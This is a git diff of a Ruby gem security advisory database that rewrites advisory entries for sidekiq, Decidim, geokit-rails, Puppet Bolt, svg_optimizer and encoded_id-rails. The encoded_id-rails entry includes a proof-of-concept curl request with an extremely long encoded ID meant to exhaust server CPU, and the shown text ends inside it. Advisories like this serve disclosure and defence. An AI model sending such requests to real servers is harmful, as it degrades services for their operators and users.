-    - https://github.com/advisories/GHSA-3qc2-v3hp-6cv8
----
+---
+layout: advisory
+title: 'CVE-2023-26141 (sidekiq): sidekiq Denial of Service vulnerability'
+comments: false
+categories:
+- sidekiq
+advisory:
+  gem: sidekiq
+  cve: 2023-26141
+  ghsa: 3qc2-v3hp-6cv8
+  url: https://nvd.nist.gov/vuln/detail/CVE-2023-26141
+  title: sidekiq Denial of Service vulnerability
+  date: 2023-09-14
+  description: |
+    Versions of the package sidekiq before 7.1.3 are vulnerable to Denial
+    of Service (DoS) due to insufficient checks in the dashboard-charts.js
+    file. An attacker can exploit this vulnerability by manipulating the
+    localStorage value which will cause excessive polling requests.
+  cvss_v3: 4.9
+  patched_versions:
+  - "~> 6.5.10"
+  - ">= 7.1.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-26141
+    - https://github.com/sidekiq/sidekiq/blob/main/Changes.md#713
+    - https://github.com/sidekiq/sidekiq/commit/62c90d7c5a7d8a378d79909859d87c2e0702bf89
+    - https://gist.github.com/keeganparr1/1dffd3c017339b7ed5371ed3d81e6b2a
+    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQ-5885107
+    - https://github.com/sidekiq/sidekiq/blob/6-x/web/assets/javascripts/dashboard.js#L6
+    - https://github.com/advisories/GHSA-3qc2-v3hp-6cv8
+---
diff --git a/advisories/_posts/2023-10-05-CVE-2023-36465.md b/advisories/_posts/2023-10-05-CVE-2023-36465.md
index a956ba0f..97415ec7 100644
--- a/advisories/_posts/2023-10-05-CVE-2023-36465.md
+++ b/advisories/_posts/2023-10-05-CVE-2023-36465.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2023-36465 (decidim): Decidim has broken access control in templates'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2023-36465
-  ghsa: 639h-86hw-qcjq
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-639h-86hw-qcjq
-  title: Decidim has broken access control in templates
-  date: 2023-10-05
-  description: |
-    ### Impact
-
-    The `templates` module doesn't enforce the correct permissions,
-    allowing any logged-in user to access to this functionality in
-    the administration panel. An attacker could use this vulnerability
-    to change, create or delete templates of surveys.
-  cvss_v3: 9.1
-  unaffected_versions:
-  - "< 0.23.2"
-  patched_versions:
-  - "~> 0.26.8"
-  - ">= 0.27.4"
-  related:
-    url:
-    - https://github.com/decidim/decidim/security/advisories/GHSA-639h-86hw-qcjq
-    - https://github.com/decidim/decidim/releases/tag/v0.26.8
-    - https://github.com/decidim/decidim/releases/tag/v0.27.4
-    - https://github.com/advisories/GHSA-639h-86hw-qcjq
-  notes: No NVD url; No cvss_v2
----
+---
+layout: advisory
+title: 'CVE-2023-36465 (decidim): Decidim has broken access control in templates'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2023-36465
+  ghsa: 639h-86hw-qcjq
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-639h-86hw-qcjq
+  title: Decidim has broken access control in templates
+  date: 2023-10-05
+  description: |
+    ### Impact
+
+    The `templates` module doesn't enforce the correct permissions,
+    allowing any logged-in user to access to this functionality in
+    the administration panel. An attacker could use this vulnerability
+    to change, create or delete templates of surveys.
+  cvss_v3: 9.1
+  unaffected_versions:
+  - "< 0.23.2"
+  patched_versions:
+  - "~> 0.26.8"
+  - ">= 0.27.4"
+  related:
+    url:
+    - https://github.com/decidim/decidim/security/advisories/GHSA-639h-86hw-qcjq
+    - https://github.com/decidim/decidim/releases/tag/v0.26.8
+    - https://github.com/decidim/decidim/releases/tag/v0.27.4
+    - https://github.com/advisories/GHSA-639h-86hw-qcjq
+  notes: No NVD url; No cvss_v2
+---
diff --git a/advisories/_posts/2023-10-06-CVE-2023-26153.md b/advisories/_posts/2023-10-06-CVE-2023-26153.md
index 37e6b28a..a20dc2af 100644
--- a/advisories/_posts/2023-10-06-CVE-2023-26153.md
+++ b/advisories/_posts/2023-10-06-CVE-2023-26153.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2023-26153 (geokit-rails): geokit-rails Command Injection vulnerability'
-comments: false
-categories:
-- geokit-rails
-advisory:
-  gem: geokit-rails
-  cve: 2023-26153
-  ghsa: 7xvc-v44j-46fh
-  url: https://github.com/advisories/GHSA-7xvc-v44j-46fh
-  title: geokit-rails Command Injection vulnerability
-  date: 2023-10-06
-  description: |
-    Versions of the package geokit-rails before 2.5.0 are vulnerable
-    to Command Injection due to unsafe deserialisation of YAML within
-    the 'geo_location' cookie. This issue can be exploited remotely
-    via a malicious cookie value.
-
-    **Note:**
-
-     An attacker can use this vulnerability to execute commands
-     on the host system.
-  cvss_v3: 8.3
-  patched_versions:
-  - ">= 2.5.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-26153
-    - https://gist.github.com/CalumHutton/b7aa1c2e71c8d4386463ac14f686901d
-    - https://github.com/geokit/geokit-rails/commit/7ffc5813e57f6f417987043e1039925fd0865c43
-    - https://github.com/geokit/geokit-rails/commit/a93dfe49fb9aeae7164e2f8c4041450a04b5482f
-    - https://github.com/geokit/geokit-rails/blob/master/lib/geokit-rails/ip_geocode_lookup.rb#L37
-    - https://security.snyk.io/vuln/SNYK-RUBY-GEOKITRAILS-5920323
-    - https://github.com/advisories/GHSA-7xvc-v44j-46fh
----
+---
+layout: advisory
+title: 'CVE-2023-26153 (geokit-rails): geokit-rails Command Injection vulnerability'
+comments: false
+categories:
+- geokit-rails
+advisory:
+  gem: geokit-rails
+  cve: 2023-26153
+  ghsa: 7xvc-v44j-46fh
+  url: https://github.com/advisories/GHSA-7xvc-v44j-46fh
+  title: geokit-rails Command Injection vulnerability
+  date: 2023-10-06
+  description: |
+    Versions of the package geokit-rails before 2.5.0 are vulnerable
+    to Command Injection due to unsafe deserialisation of YAML within
+    the 'geo_location' cookie. This issue can be exploited remotely
+    via a malicious cookie value.
+
+    **Note:**
+
+     An attacker can use this vulnerability to execute commands
+     on the host system.
+  cvss_v3: 8.3
+  patched_versions:
+  - ">= 2.5.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-26153
+    - https://gist.github.com/CalumHutton/b7aa1c2e71c8d4386463ac14f686901d
+    - https://github.com/geokit/geokit-rails/commit/7ffc5813e57f6f417987043e1039925fd0865c43
+    - https://github.com/geokit/geokit-rails/commit/a93dfe49fb9aeae7164e2f8c4041450a04b5482f
+    - https://github.com/geokit/geokit-rails/blob/master/lib/geokit-rails/ip_geocode_lookup.rb#L37
+    - https://security.snyk.io/vuln/SNYK-RUBY-GEOKITRAILS-5920323
+    - https://github.com/advisories/GHSA-7xvc-v44j-46fh
+---
diff --git a/advisories/_posts/2023-10-06-CVE-2023-5214.md b/advisories/_posts/2023-10-06-CVE-2023-5214.md
index 960c2886..86c882d7 100644
--- a/advisories/_posts/2023-10-06-CVE-2023-5214.md
+++ b/advisories/_posts/2023-10-06-CVE-2023-5214.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2023-5214 (bolt): Puppet Bolt privilege escalation vulnerability'
-comments: false
-categories:
-- bolt
-advisory:
-  gem: bolt
-  cve: 2023-5214
-  ghsa: 289m-2964-f8q5
-  url: https://www.puppet.com/security/cve/cve-2023-5214-privilege-escalation-puppet-bolt
-  title: Puppet Bolt privilege escalation vulnerability
-  date: 2023-10-06
-  description: |
-    In Puppet Bolt versions prior to 3.27.4, a path
-    to escalate privileges was identified.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 3.27.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-5214
-    - https://www.puppet.com/security/cve/cve-2023-5214-privilege-escalation-puppet-bolt
-    - https://yanac.hu/2023/10/07/cve-2023-5214-puppetlabs-puppet-bolt-up-to-3-27-3-privileges-management
-    - https://github.com/advisories/GHSA-289m-2964-f8q5
----
+---
+layout: advisory
+title: 'CVE-2023-5214 (bolt): Puppet Bolt privilege escalation vulnerability'
+comments: false
+categories:
+- bolt
+advisory:
+  gem: bolt
+  cve: 2023-5214
+  ghsa: 289m-2964-f8q5
+  url: https://www.puppet.com/security/cve/cve-2023-5214-privilege-escalation-puppet-bolt
+  title: Puppet Bolt privilege escalation vulnerability
+  date: 2023-10-06
+  description: |
+    In Puppet Bolt versions prior to 3.27.4, a path
+    to escalate privileges was identified.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 3.27.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5214
+    - https://www.puppet.com/security/cve/cve-2023-5214-privilege-escalation-puppet-bolt
+    - https://yanac.hu/2023/10/07/cve-2023-5214-puppetlabs-puppet-bolt-up-to-3-27-3-privileges-management
+    - https://github.com/advisories/GHSA-289m-2964-f8q5
+---
diff --git a/advisories/_posts/2023-10-19-CVE-2023-46035.md b/advisories/_posts/2023-10-19-CVE-2023-46035.md
index d87d3c4e..b4b1aa07 100644
--- a/advisories/_posts/2023-10-19-CVE-2023-46035.md
+++ b/advisories/_posts/2023-10-19-CVE-2023-46035.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2023-46035 (svg_optimizer): External XML entity (XXE) vulnerability in
-  svg_optimizer rubygem'
-comments: false
-categories:
-- svg_optimizer
-advisory:
-  gem: svg_optimizer
-  cve: 2023-46035
-  ghsa: 6hvg-62q8-95v7
-  url: https://github.com/fnando/svg_optimizer/pull/17
-  title: External XML entity (XXE) vulnerability in svg_optimizer rubygem
-  date: 2023-10-19
-  description: |
-    An issue in Fnando svg_optimizer v.0.2.6 allows a remote attacker to escalate privileges when
-    optimizing untrusted SVG content.
-  patched_versions:
-  - ">= 0.3.0"
----
+---
+layout: advisory
+title: 'CVE-2023-46035 (svg_optimizer): External XML entity (XXE) vulnerability in
+  svg_optimizer rubygem'
+comments: false
+categories:
+- svg_optimizer
+advisory:
+  gem: svg_optimizer
+  cve: 2023-46035
+  ghsa: 6hvg-62q8-95v7
+  url: https://github.com/fnando/svg_optimizer/pull/17
+  title: External XML entity (XXE) vulnerability in svg_optimizer rubygem
+  date: 2023-10-19
+  description: |
+    An issue in Fnando svg_optimizer v.0.2.6 allows a remote attacker to escalate privileges when
+    optimizing untrusted SVG content.
+  patched_versions:
+  - ">= 0.3.0"
+---
diff --git a/advisories/_posts/2023-10-24-CVE-2024-0241.md b/advisories/_posts/2023-10-24-CVE-2024-0241.md
index 397f64bd..184a0c2f 100644
--- a/advisories/_posts/2023-10-24-CVE-2024-0241.md
+++ b/advisories/_posts/2023-10-24-CVE-2024-0241.md
@@ -1,66 +1,66 @@
----
-layout: advisory
-title: 'CVE-2024-0241 (encoded_id-rails): encoded_id-rails potential DOS vulnerability
-  due to URIs with extremely long encoded IDs'
-comments: false
-categories:
-- encoded_id-rails
-advisory:
-  gem: encoded_id-rails
-  cve: 2024-0241
-  ghsa: 3px7-jm2p-6h2c
-  url: https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c
-  title: encoded_id-rails potential DOS vulnerability due to URIs with extremely long
-    encoded IDs
-  date: 2023-10-24
-  description: |
-    ### Impact
-
-    The length of URIs and the various parts (eg path segments, query
-    parameters) is usually limited by the webserver processing the
-    incoming request. In the case of Puma the defaults are :
-
-    - path segment length: 8192
-    - Max URI length: 1024 * 12
-    - Max query length: 1024 * 10
-
-    See https://github.com/puma/puma/blob/master/docs/compile_options.md
-
-    If too long Puma raises:
-    > Puma caught this error: HTTP element REQUEST_PATH is longer than
-      the (8192) allowed length (was 12503) (Puma::HttpParserError)
-
-    However due to the performance of `hashids` extremely long encoded
-    IDs will consume a large amount of CPU and allocate a huge number
-    of intermediate objects.
-
-    For example:
-
-    ```
-    curl -vvv https://localhost.ssl:3000//dos?id=abcd-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa